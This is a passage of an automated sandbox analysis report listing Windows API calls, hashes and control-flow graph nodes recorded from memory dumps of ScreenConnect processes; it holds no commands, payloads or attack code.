                                                                  • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 0585199F
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2691759484.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5850000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcessUser
                                                                  • String ID:
                                                                  • API String ID: 2217836671-0
                                                                  • Opcode ID: fe9e3be56d9b30e93d97d548c219cf70eca19816e7b57ee789f6566f923d4256
                                                                  • Instruction ID: 8338da1b2b6537940896fb74600d753c7f2285aa20207786085a29802a53d35f
                                                                  • Opcode Fuzzy Hash: fe9e3be56d9b30e93d97d548c219cf70eca19816e7b57ee789f6566f923d4256
                                                                  • Instruction Fuzzy Hash: F241357690020ADFCF10CFA9C884ADEBBF2FF48320F15852AE959A7250D775A955CF90

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 609 58559c4-5855a5e ConnectNamedPipe 611 5855a67-5855aa9 609->611 612 5855a60-5855a66 609->612 616 5855ab3 611->616 617 5855aab 611->617 612->611 618 5855ab4 616->618 617->616 618->618
                                                                  APIs
                                                                  • ConnectNamedPipe.KERNEL32(00000000), ref: 05855A48
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2691759484.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5850000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: ConnectNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 2191148154-0
                                                                  • Opcode ID: ee6161dcc8ff835c2186b6e487e77e33f6d700a711c917292fa4b9da9a4bfe8f
                                                                  • Instruction ID: a3320d605a6299dfeeeb3c02065672a5b2e4ceb40b644321a938cabfa3d8e356
                                                                  • Opcode Fuzzy Hash: ee6161dcc8ff835c2186b6e487e77e33f6d700a711c917292fa4b9da9a4bfe8f
                                                                  • Instruction Fuzzy Hash: CD2144B0D04218DFCB14CFA9D584BDEBFF5AF08210F14806AE859AB341CB75A946CFA0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 619 5852938-58536aa 621 58536b2-5853717 CreateNamedPipeW 619->621 622 58536ac-58536af 619->622 624 5853720-5853741 621->624 625 5853719-585371f 621->625 622->621 625->624
                                                                  APIs
                                                                  • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 05853704
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2691759484.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5850000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 2489174969-0
                                                                  • Opcode ID: 76845519bc65a9a1cbf62647031e0cfb401c7e9d3c5751d94dba2cea5ce45744
                                                                  • Instruction ID: 5f7ed42428262d8fedad86a881ab7a7ba659b87cac44d591330cafe43b22ca2c
                                                                  • Opcode Fuzzy Hash: 76845519bc65a9a1cbf62647031e0cfb401c7e9d3c5751d94dba2cea5ce45744
                                                                  • Instruction Fuzzy Hash: B83111B5800208EFDB10CFAAD584A8ABFF1BB48324F14C069E919AB221D775A859CF50
                                                                  APIs
                                                                  • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 05D4653D
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2693259585.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5d40000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: EnumProcesses
                                                                  • String ID:
                                                                  • API String ID: 84517404-0
                                                                  • Opcode ID: e090282a9e2c4097c9c6f2545b756f0d8d8014e84fa3c37ae48f84f3480aa6fd
                                                                  • Instruction ID: a4e9333e781be3f63aadac5e940192dc387ef77ab975cf7b65d93bea6d9da9d2
                                                                  • Opcode Fuzzy Hash: e090282a9e2c4097c9c6f2545b756f0d8d8014e84fa3c37ae48f84f3480aa6fd
                                                                  • Instruction Fuzzy Hash: 492114B69042499FDB10CF9AD984BDEBBF4FB49310F10842EE519A7340D778A945CFA4
                                                                  APIs
                                                                  • ConnectNamedPipe.KERNEL32(00000000), ref: 05855A48
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2691759484.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5850000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: ConnectNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 2191148154-0
                                                                  • Opcode ID: 14cc8a61a7833ee4e11b45516b890f33b4050dbe40d3094eae6ab1704f37a991
                                                                  • Instruction ID: e59ab9cf4caa90af730508b393c59eee7877e3391a52ae3d6e6da977346be039
                                                                  • Opcode Fuzzy Hash: 14cc8a61a7833ee4e11b45516b890f33b4050dbe40d3094eae6ab1704f37a991
                                                                  • Instruction Fuzzy Hash: 6D2113B0D04258DFCB14CFAAD594B9EBBF5AF48314F14806AE859AB340DB75A905CFA0
                                                                  APIs
                                                                  • WaitNamedPipeW.KERNEL32(00000000), ref: 0585677F
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2691759484.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5850000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: NamedPipeWait
                                                                  • String ID:
                                                                  • API String ID: 3146367894-0
                                                                  • Opcode ID: 08a2a2c846c2634f228effa43c0d28658471f14fbc07c1d1151c08c0f3aeccf0
                                                                  • Instruction ID: 248acd57e5e581f27a7ffa8ab2b58ea769c3eac522c278d165119ae7d631862b
                                                                  • Opcode Fuzzy Hash: 08a2a2c846c2634f228effa43c0d28658471f14fbc07c1d1151c08c0f3aeccf0
                                                                  • Instruction Fuzzy Hash: 082129B58003098FDB10CF96D5847DEBBF4FB48324F14842DD859A7641D779A546CFA1
                                                                  APIs
                                                                  • WaitNamedPipeW.KERNEL32(00000000), ref: 0585677F
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2691759484.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5850000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: NamedPipeWait
                                                                  • String ID:
                                                                  • API String ID: 3146367894-0
                                                                  • Opcode ID: f53408d38a60cf68bce69b4139d6b92256573e1bc299b999aa0a8b483eccfe9d
                                                                  • Instruction ID: 2cb6c95107727edd43f17c72c6564281211f3f0e1ebebd70f1f18b55d073f298
                                                                  • Opcode Fuzzy Hash: f53408d38a60cf68bce69b4139d6b92256573e1bc299b999aa0a8b483eccfe9d
                                                                  • Instruction Fuzzy Hash: B021F4B68003098FDB10CF9AC544BDEBBF5EB48324F14846ED869A7640D779A945CFA1
                                                                  APIs
                                                                  • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05D4661E
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2693259585.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5d40000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessSession
                                                                  • String ID:
                                                                  • API String ID: 3779259828-0
                                                                  • Opcode ID: 7bc37f37d27f03de834aa7868940f785defe1966c9862dbc385543dd7e84f56e
                                                                  • Instruction ID: cfa61229b8f3f95f417e36d3d923b51c4e5961f8df7485f16ca248839a8f64bb
                                                                  • Opcode Fuzzy Hash: 7bc37f37d27f03de834aa7868940f785defe1966c9862dbc385543dd7e84f56e
                                                                  • Instruction Fuzzy Hash: 6B1100B1C002098FCB10CF9AC985BDEFBF4FB48224F14846AD869A3640D779A545CFA5
                                                                  APIs
                                                                  • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05D4661E
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2693259585.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5d40000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessSession
                                                                  • String ID:
                                                                  • API String ID: 3779259828-0
                                                                  • Opcode ID: 2d4b4ecbc3170646f8b77efc65244ea116d3ea77eaa318ac97a89c78eda98223
                                                                  • Instruction ID: 86a5c2fbc34be1e638531c3c9c563b4003df3a25c4bb2241d368e58dfebf3d16
                                                                  • Opcode Fuzzy Hash: 2d4b4ecbc3170646f8b77efc65244ea116d3ea77eaa318ac97a89c78eda98223
                                                                  • Instruction Fuzzy Hash: 421130B1C002498FDB10CF9AC584BEEBBF4EB48224F10806AD469A3240D378A945CFA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2661477988.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_14bd000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6fb6e0380e9b8535287181e97f278ebc6be0826738e44f74a3fef1941f7eb5e4
                                                                  • Instruction ID: 2ff8582673e4f15fbd91bd8f8722a39ce9ed3d01fbfac5111a77208ca32f6d4b
                                                                  • Opcode Fuzzy Hash: 6fb6e0380e9b8535287181e97f278ebc6be0826738e44f74a3fef1941f7eb5e4
                                                                  • Instruction Fuzzy Hash: 71212875904380DFDB05DF94D9C0B97BF65FB88318F2481AAD8090B266C336D456CBB1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2661477988.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_14bd000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                                  • Instruction ID: 36327106fd8f3dbdcd0c307c13c2919e8985e1e77c42bf5ce1a251391f82aa4a
                                                                  • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                                  • Instruction Fuzzy Hash: 2211AF76904280CFCB16CF54D9C4B96BF62FB88324F2486AAD8090B667C336D456CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2661477988.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_14bd000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e878acd9bfae7a53e4ba668f1db6e9fbe962a44042df89901a45bd53b5b4f444
                                                                  • Instruction ID: 9a10a5cd0f0702e5792412bba10a590b1db06b561d25548fa45dba2c3c7bd900
                                                                  • Opcode Fuzzy Hash: e878acd9bfae7a53e4ba668f1db6e9fbe962a44042df89901a45bd53b5b4f444
                                                                  • Instruction Fuzzy Hash: 5101007240D7C05FD7128B258994B52BFB4DF43268F1981DBD9888F2A3C2795849CB72
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2661477988.00000000014BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_14bd000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 511f85c972880fdc309513eeb391e1ac03a847eebf8497cfaacf370e9ae4a65c
                                                                  • Instruction ID: 9dfaadb16ae34118bf6c9118623d60c0ae55bafeccd20e74e4f825b7f1436828
                                                                  • Opcode Fuzzy Hash: 511f85c972880fdc309513eeb391e1ac03a847eebf8497cfaacf370e9ae4a65c
                                                                  • Instruction Fuzzy Hash: 3701F7B18043009BE7104E55CDC0BA7BF98DF412ACF08C09BED484A292C6799402CAB2
                                                                  APIs
                                                                  • RtlGetVersion.NTDLL(0000009C), ref: 01514DBE
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.2662021821.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_1510000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: Version
                                                                  • String ID:
                                                                  • API String ID: 1889659487-0
                                                                  • Opcode ID: 681945afbf7d962a39612b1d94b8cd109d9125ba7984420df45e5350e8e6bea0
                                                                  • Instruction ID: d6f6213f10f9cffe3d9fe6e6737af9a7d3a774f8cd5448c0332901a816ac76ae
                                                                  • Opcode Fuzzy Hash: 681945afbf7d962a39612b1d94b8cd109d9125ba7984420df45e5350e8e6bea0
                                                                  • Instruction Fuzzy Hash: 63212571901228DFEF61CF59C944B9AFBB9FB04304F1081D9D51CA7690CBB56A98CFA2

                                                                  Execution Graph

                                                                  Execution Coverage:11.1%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:5
                                                                  Total number of Limit Nodes:1
                                                                  execution_graph 11232 7ff886a57fc4 11234 7ff886a57fcd 11232->11234 11233 7ff886a58032 11234->11233 11235 7ff886a580a6 SetProcessMitigationPolicy 11234->11235 11236 7ff886a58102 11235->11236

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 275 7ff886d65cb6-7ff886d65d14 call 7ff886d60c30 * 2 282 7ff886d66aae-7ff886d66ac1 275->282 283 7ff886d65d1a-7ff886d65d28 275->283 285 7ff886d65d2e-7ff886d65d3d call 7ff886d60e20 283->285 286 7ff886d65d2a-7ff886d65d2c 283->286 288 7ff886d65d40-7ff886d65d42 285->288 286->288 290 7ff886d65d48-7ff886d65d64 288->290 291 7ff886d65e82-7ff886d65e85 288->291 290->291 310 7ff886d65d6a-7ff886d65d7c 290->310 292 7ff886d65e8b-7ff886d65e96 291->292 293 7ff886d65fc0-7ff886d65fc7 291->293 295 7ff886d65e98-7ff886d65eb5 292->295 296 7ff886d65ee2-7ff886d65ef0 292->296 297 7ff886d65fcd-7ff886d65fd4 293->297 298 7ff886d66057-7ff886d6605e 293->298 305 7ff886d66acb-7ff886d66ad3 295->305 306 7ff886d65ebb-7ff886d65ee0 295->306 296->293 297->298 300 7ff886d65fda-7ff886d65fe4 297->300 301 7ff886d66069-7ff886d6607c 298->301 302 7ff886d66060-7ff886d66067 298->302 307 7ff886d660a6-7ff886d660ad 300->307 319 7ff886d65fea-7ff886d6601f 300->319 320 7ff886d6608d-7ff886d66095 301->320 321 7ff886d6607e-7ff886d66083 301->321 302->301 302->307 322 7ff886d66ad4-7ff886d66adc 305->322 306->296 308 7ff886d66311-7ff886d66318 307->308 309 7ff886d660b3-7ff886d660ba 307->309 308->282 315 7ff886d6631e-7ff886d66325 308->315 309->308 314 7ff886d660c0-7ff886d660c3 309->314 316 7ff886d65d7e-7ff886d65d9b 310->316 317 7ff886d65dca-7ff886d65dda 310->317 324 7ff886d660cc-7ff886d660da 314->324 325 7ff886d660c5-7ff886d660c7 314->325 315->282 326 7ff886d6632b-7ff886d6633d 315->326 335 7ff886d65da1-7ff886d65dc8 316->335 336 7ff886d66ac2-7ff886d66aca 316->336 319->322 330 7ff886d6609b-7ff886d6609f 320->330 331 7ff886d66b01-7ff886d66bd6 320->331 321->320 346 7ff886d66add-7ff886d66aee 322->346 347 7ff886d660dc 324->347 348 7ff886d660de 324->348 332 7ff886d6617a-7ff886d6617d 325->332 333 7ff886d6633f-7ff886d6634a 326->333 334 7ff886d66389-7ff886d6639c 326->334 330->307 449 7ff886d66bdd-7ff886d66c08 331->449 340 7ff886d6617f-7ff886d66181 332->340 341 7ff886d66186-7ff886d66194 332->341 350 7ff886d6630d 333->350 351 7ff886d6634c-7ff886d6635c 333->351 355 7ff886d663a3-7ff886d663ae 334->355 335->317 336->305 349 7ff886d66235-7ff886d6623b 340->349 371 7ff886d66198 341->371 372 7ff886d66196 341->372 360 7ff886d66aef-7ff886d66b00 346->360 358 7ff886d660e0-7ff886d660e3 347->358 348->358 356 7ff886d662ed-7ff886d662ef 349->356 357 7ff886d66241-7ff886d66243 349->357 350->308 351->360 361 7ff886d66362-7ff886d66387 351->361 366 7ff886d663b4-7ff886d663cc 355->366 367 7ff886d66451-7ff886d66457 355->367 356->308 365 7ff886d662f1-7ff886d662f9 356->365 357->356 368 7ff886d66249-7ff886d6627d 357->368 369 7ff886d660ed-7ff886d660f8 358->369 370 7ff886d660e5-7ff886d660eb 358->370 360->331 361->334 365->308 379 7ff886d662fb-7ff886d6630b 365->379 366->367 398 7ff886d663d2-7ff886d66445 366->398 367->282 380 7ff886d6645d-7ff886d66465 367->380 368->356 377 7ff886d660fa-7ff886d66117 369->377 378 7ff886d66144-7ff886d66165 369->378 376 7ff886d66168-7ff886d66178 370->376 381 7ff886d6619a-7ff886d6619d 371->381 372->381 376->332 377->346 400 7ff886d6611d-7ff886d66142 377->400 378->376 379->350 391 7ff886d664ad-7ff886d664b5 380->391 392 7ff886d66467-7ff886d664a6 380->392 383 7ff886d6619f-7ff886d661a5 381->383 384 7ff886d661a7-7ff886d661b2 381->384 395 7ff886d66223-7ff886d66233 383->395 396 7ff886d661fe-7ff886d66220 384->396 397 7ff886d661b4-7ff886d661c0 384->397 391->282 402 7ff886d664bb-7ff886d66534 391->402 392->391 395->349 396->395 398->367 400->378 433 7ff886d6653a-7ff886d6667c 402->433 434 7ff886d66aa1-7ff886d66aa8 402->434 486 7ff886d66683-7ff886d6671a 433->486 434->282 434->402 455 7ff886d66c0a-7ff886d66c1b 449->455 456 7ff886d66bd3-7ff886d66bd6 449->456 459 7ff886d66c1d-7ff886d66c97 455->459 460 7ff886d66c15-7ff886d66c1b 455->460 456->449 481 7ff886d66c99-7ff886d66cc0 459->481 460->459 460->460 485 7ff886d66cc2-7ff886d66ce3 481->485 493 7ff886d66ce8-7ff886d66d11 485->493 494 7ff886d6671c-7ff886d6671e 486->494 495 7ff886d66720-7ff886d66721 486->495 512 7ff886d66d13-7ff886d66da3 493->512 496 7ff886d66728-7ff886d66735 494->496 495->496 498 7ff886d6676b 496->498 499 7ff886d66737-7ff886d6674f 496->499 500 7ff886d6676f-7ff886d66772 498->500 509 7ff886d6676d 499->509 510 7ff886d66751-7ff886d66766 499->510 501 7ff886d66785-7ff886d66788 500->501 502 7ff886d66774-7ff886d66781 500->502 506 7ff886d6678a-7ff886d6678b 501->506 507 7ff886d66792-7ff886d667bb 501->507 502->501 511 7ff886d66783 502->511 506->507 523 7ff886d667c2-7ff886d66859 507->523 509->500 510->486 511->501 529 7ff886d6685f-7ff886d66860 523->529 530 7ff886d6685b-7ff886d6685d 523->530 532 7ff886d66867-7ff886d66874 529->532 530->532 533 7ff886d668aa 532->533 534 7ff886d66876-7ff886d6688e 532->534 536 7ff886d668ae-7ff886d668b1 533->536 543 7ff886d668ac 534->543 544 7ff886d66890-7ff886d668a5 534->544 538 7ff886d668c4-7ff886d668c7 536->538 539 7ff886d668b3-7ff886d668c0 536->539 540 7ff886d668c9-7ff886d668ca 538->540 541 7ff886d668d1-7ff886d66924 call 7ff886d65338 538->541 539->538 546 7ff886d668c2 539->546 540->541 541->434 543->536 544->523 546->538
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e7e3cfd74e520ff00c1564a85009b6384b3ba5b8fb0086b63cc39b5130ae7427
                                                                  • Instruction ID: 0daa1fce13c8a70e2b407b51cf37efb12511256f8d2c2b131c01224704bd1599
                                                                  • Opcode Fuzzy Hash: e7e3cfd74e520ff00c1564a85009b6384b3ba5b8fb0086b63cc39b5130ae7427
                                                                  • Instruction Fuzzy Hash: 4C62C330A18A8A4FEB98DA288465BB533D1FF94780F54017DE44FC72D6DE29BC45C782

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 555 7ff886d66dfb-7ff886d66e1e 558 7ff886d66e1f-7ff886d66e44 555->558 562 7ff886d66e46-7ff886d66f4c 558->562 576 7ff886d66f4e-7ff886d66f6a 562->576 577 7ff886d66f96-7ff886d66fa6 562->577 578 7ff886d672ef-7ff886d6730d call 7ff886d60c30 * 2 576->578 579 7ff886d66f70-7ff886d66f8e call 7ff886d60c30 * 2 576->579 584 7ff886d66fac-7ff886d66fba call 7ff886d60e20 577->584 585 7ff886d66fa8-7ff886d66faa 577->585 596 7ff886d67419-7ff886d67424 578->596 597 7ff886d67313-7ff886d6731a 578->597 594 7ff886d67185-7ff886d671a3 call 7ff886d60c30 * 2 579->594 595 7ff886d66f94-7ff886d66f95 579->595 588 7ff886d66fbd-7ff886d66fd2 584->588 585->588 602 7ff886d66fd8-7ff886d66fe6 call 7ff886d60e20 588->602 603 7ff886d66fd4-7ff886d66fd6 588->603 617 7ff886d671cd-7ff886d671eb call 7ff886d60c30 * 2 594->617 618 7ff886d671a5-7ff886d671af 594->618 595->577 600 7ff886d6732d-7ff886d6732f 597->600 601 7ff886d6731c-7ff886d6732b 597->601 605 7ff886d67336-7ff886d6735a 600->605 601->600 613 7ff886d67331 601->613 606 7ff886d66fe9-7ff886d66ff7 602->606 603->606 619 7ff886d6735c-7ff886d67379 605->619 620 7ff886d673a6-7ff886d673b4 605->620 615 7ff886d66ffd-7ff886d6700b call 7ff886d60e20 606->615 616 7ff886d66ff9-7ff886d66ffb 606->616 613->605 621 7ff886d6700e-7ff886d67028 615->621 616->621 639 7ff886d671f1-7ff886d671fc 617->639 640 7ff886d672a2-7ff886d672ad 617->640 623 7ff886d671b1-7ff886d671c1 618->623 624 7ff886d671c3 618->624 628 7ff886d6737f-7ff886d673a4 619->628 629 7ff886d67425-7ff886d67497 619->629 620->596 648 7ff886d6702f-7ff886d67036 621->648 631 7ff886d671c5-7ff886d671c6 623->631 624->631 628->620 649 7ff886d67499-7ff886d674dd 629->649 650 7ff886d674e0-7ff886d67536 629->650 631->617 651 7ff886d671fe-7ff886d67200 639->651 652 7ff886d67202-7ff886d67211 call 7ff886d60e20 639->652 653 7ff886d672af-7ff886d672b1 640->653 654 7ff886d672b3-7ff886d672c2 call 7ff886d60e20 640->654 648->594 655 7ff886d6703c-7ff886d67043 648->655 649->650 687 7ff886d6753c-7ff886d67560 650->687 688 7ff886d67538-7ff886d67539 650->688 657 7ff886d67214-7ff886d67248 651->657 652->657 659 7ff886d672c5-7ff886d672c7 653->659 654->659 655->594 662 7ff886d67049-7ff886d67060 655->662 657->640 670 7ff886d6724a-7ff886d6724f 657->670 659->596 668 7ff886d672cd-7ff886d672ee 659->668 672 7ff886d67095-7ff886d670a0 662->672 673 7ff886d67062-7ff886d67074 662->673 675 7ff886d67252-7ff886d67258 670->675 692 7ff886d670a6-7ff886d670b5 call 7ff886d60e20 672->692 693 7ff886d670a2-7ff886d670a4 672->693 689 7ff886d6707a-7ff886d67088 call 7ff886d60e20 673->689 690 7ff886d67076-7ff886d67078 673->690 678 7ff886d6726b-7ff886d67273 675->678 679 7ff886d6725a-7ff886d67262 675->679 684 7ff886d67274-7ff886d67275 678->684 686 7ff886d67285-7ff886d672a0 678->686 679->684 685 7ff886d67264-7ff886d67269 679->685 694 7ff886d6727a-7ff886d67284 call 7ff886d66c10 684->694 685->694 686->640 686->675 709 7ff886d67592-7ff886d6759b 687->709 710 7ff886d67562-7ff886d67571 687->710 688->687 698 7ff886d6708b-7ff886d6708e 689->698 690->698 700 7ff886d670b8-7ff886d670ba 692->700 693->700 694->686 698->672 704 7ff886d6716f-7ff886d67181 700->704 705 7ff886d670c0-7ff886d670d7 700->705 704->594 715 7ff886d67165-7ff886d6716d call 7ff886d65588 704->715 705->704 716 7ff886d670dd-7ff886d670fa 705->716 713 7ff886d67577-7ff886d67591 710->713 714 7ff886d67573-7ff886d67574 710->714 714->713 715->594 723 7ff886d670fc-7ff886d67104 716->723 724 7ff886d67106 716->724 725 7ff886d67108-7ff886d6710a 723->725 724->725 725->704 727 7ff886d6710c-7ff886d67116 725->727 728 7ff886d67118-7ff886d67122 call 7ff886d63e38 727->728 729 7ff886d67124-7ff886d6712c 727->729 728->594 728->729 731 7ff886d6712e-7ff886d67153 call 7ff886d65460 729->731 732 7ff886d6715a-7ff886d67161 729->732 731->732 732->715
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 080de9315afbc64251948abf2bb8d979390a38c17ee8e0be8faa1ab75208ba9c
                                                                  • Instruction ID: 42342f7d5774f951a7515823cc6223c20ee44225bcd71385c1dcfabd6ea256de
                                                                  • Opcode Fuzzy Hash: 080de9315afbc64251948abf2bb8d979390a38c17ee8e0be8faa1ab75208ba9c
                                                                  • Instruction Fuzzy Hash: 1F22F171E1CA8A4FEB99D66884256B967D2FF94390F54407AE04FCB2D3DD2ABC05C381

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 737 7ff886d603f2-7ff886d60418 740 7ff886d60469-7ff886d60482 737->740 741 7ff886d6041a-7ff886d60441 737->741 746 7ff886d60483-7ff886d6048e 740->746 741->746 748 7ff886d60443-7ff886d60467 741->748 749 7ff886d604d8-7ff886d60500 746->749 750 7ff886d60490-7ff886d604c6 746->750 748->740 756 7ff886d60524-7ff886d6053c 749->756 757 7ff886d60502-7ff886d60521 749->757 764 7ff886d6053e-7ff886d6055d 756->764 765 7ff886d60560-7ff886d6057e 756->765 757->756 764->765 768 7ff886d6059a 765->768 769 7ff886d60580-7ff886d60590 765->769 771 7ff886d6059f-7ff886d605a5 768->771 774 7ff886d60597-7ff886d60598 769->774 772 7ff886d6063e-7ff886d60641 771->772 773 7ff886d605ab-7ff886d605b4 771->773 775 7ff886d60643-7ff886d6064d 772->775 776 7ff886d605cd-7ff886d605d8 773->776 777 7ff886d605b6-7ff886d605c3 773->777 774->768 782 7ff886d60655-7ff886d60672 775->782 779 7ff886d605da-7ff886d605f7 776->779 780 7ff886d60624-7ff886d60632 776->780 777->776 783 7ff886d605c5-7ff886d605cb 777->783 785 7ff886d605fd-7ff886d60622 779->785 786 7ff886d608e2-7ff886d6093f 779->786 780->772 792 7ff886d606ee-7ff886d606fa 782->792 793 7ff886d60674 782->793 783->776 785->780 813 7ff886d6094b-7ff886d60952 786->813 814 7ff886d60941-7ff886d6094a 786->814 796 7ff886d606fc-7ff886d606fe 792->796 797 7ff886d60700-7ff886d60701 792->797 798 7ff886d606ba-7ff886d606c6 793->798 799 7ff886d60676-7ff886d6067a 793->799 804 7ff886d60711-7ff886d6072e 796->804 807 7ff886d60702-7ff886d6070e call 7ff886d60100 797->807 802 7ff886d606cc-7ff886d606d5 call 7ff886d60100 798->802 803 7ff886d606c8-7ff886d606ca 798->803 805 7ff886d6067c-7ff886d60681 799->805 806 7ff886d606eb-7ff886d606ec 799->806 815 7ff886d606da 802->815 809 7ff886d606dd-7ff886d606fa 803->809 823 7ff886d60734-7ff886d60742 call 7ff886d60100 804->823 824 7ff886d60730-7ff886d60732 804->824 805->807 811 7ff886d60683-7ff886d6068e 805->811 806->792 807->804 809->796 809->797 817 7ff886d606ff 811->817 818 7ff886d60690-7ff886d606b6 call 7ff886d600e0 811->818 820 7ff886d6095e-7ff886d60969 813->820 821 7ff886d60954-7ff886d6095d 813->821 815->809 817->797 832 7ff886d606bc-7ff886d606c6 818->832 833 7ff886d60800-7ff886d6081e call 7ff886d600e0 * 2 818->833 828 7ff886d60745-7ff886d60762 823->828 824->828 836 7ff886d60768-7ff886d60776 call 7ff886d60100 828->836 837 7ff886d60764-7ff886d60766 828->837 832->802 832->803 847 7ff886d608bd-7ff886d608df 833->847 848 7ff886d60824-7ff886d6082e 833->848 840 7ff886d60779-7ff886d6078f 836->840 837->840 845 7ff886d607a6-7ff886d607ad 840->845 846 7ff886d60791-7ff886d607a4 call 7ff886d60100 840->846 856 7ff886d607b4-7ff886d607c7 845->856 846->845 857 7ff886d607cd-7ff886d607d0 846->857 851 7ff886d60834-7ff886d60842 call 7ff886d60100 848->851 852 